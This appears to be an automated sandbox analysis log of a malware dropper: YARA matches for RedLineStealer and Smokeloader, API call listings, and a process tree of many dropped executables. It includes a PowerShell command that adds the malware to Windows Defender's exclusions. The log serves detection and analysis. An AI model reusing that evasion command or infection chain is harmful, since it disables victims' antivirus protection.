Source: 0000002A.00000002.3211879982.00000000012C8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000023.00000002.3204206599.0000000001099000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000023.00000002.3216579731.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@200/533@0/100
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 17_2_6A407030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,17_2_6A407030
Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe | Code function: 12_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,12_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Code function: 14_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,14_2_004555E4
Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Code function: 14_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,14_2_00455E0C
Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe | Code function: CreateServiceA,16_2_004028A4
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 17_2_00414DE0 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,17_2_00414DE0
Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe | Code function: 15_2_00402988 CoCreateInstance,MultiByteToWideChar,15_2_00402988
Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe | Code function: 12_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,12_2_00409C34
Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe | Code function: 16_2_004026E9 StartServiceCtrlDispatcherA,16_2_004026E9
Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe | Code function: 16_2_0040D234 StartServiceCtrlDispatcherA,16_2_0040D234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\pxXbxOFPbFSHTNbciHYCsLtx.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7564
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:44312:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:12152:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5kguwrd.iza.ps1
Source: Yara match | File source: 16.0.weblinkanalyzer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.weblinkanalyzer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000000.2055445939.0000000000401000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000000.2004294396.0000000000401000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3151972256.0000000000401000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Web Link Analyzer\is-5KR53.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: file.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: syncUpd.exe, syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe | ReversingLabs: Detection: 18%
Source: fwUkFVOLVOFs3NY104r7giRJ.exe | String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7564 -ip 7564
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7564 -s 73500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe "C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe | Process created: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp "C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp" /SL5="$104B0,1807550,56832,C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe "C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe"
Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Process created: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe "C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe | Process created: C:\Users\user\AppData\Local\Temp\syncUpd.exe C:\Users\user\AppData\Local\Temp\syncUpd.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe "C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe "C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe"
Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe | Process created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Process created: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe "C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
Source: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe | Process created: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp "C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp" /SL5="$504EC,1807550,56832,C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe "C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe "C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --silent --allusers=0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe "C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe"
Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe | Process created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6bfa21c8,0x6bfa21d4,0x6bfa21e0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe "C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe "C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe" --silent --allusers=0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe "C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe "C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe "C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe"
Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe | Process created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x304,0x6b3921c8,0x6b3921d4,0x6b3921e0
Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe | Process created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --version
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe "C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe "C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe "C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe" --silent --allusers=0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe "C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe "C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe | Process created: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp "C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp" /SL5="$30596,1807550,56832,C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe "C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe "C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe" --silent --allusers=0
Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe | Process created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2bc,0x300,0x6aa121c8,0x6aa121d4,0x6aa121e0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7564 -ip 7564
                        Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7564 -s 73500
                        Source: C:\Windows\System32\WerFault.exe Process created: unknown unknown
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Process created: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp "C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp" /SL5="$104B0,1807550,56832,C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe"
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Process created: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe "C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Process created: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe "C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe Process created: C:\Users\user\AppData\Local\Temp\syncUpd.exe C:\Users\user\AppData\Local\Temp\syncUpd.exe
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe Process created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                        Source: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe Process created: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp "C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp" /SL5="$504EC,1807550,56832,C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe"
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe Process created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6bfa21c8,0x6bfa21d4,0x6bfa21e0
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe Process created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --version
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe Process created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x304,0x6b3921c8,0x6b3921d4,0x6b3921e0
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe Process created: unknown unknown
                        Source: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe Process created: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp "C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp" /SL5="$30596,1807550,56832,C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe"
                        Source: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe Process created: unknown unknown
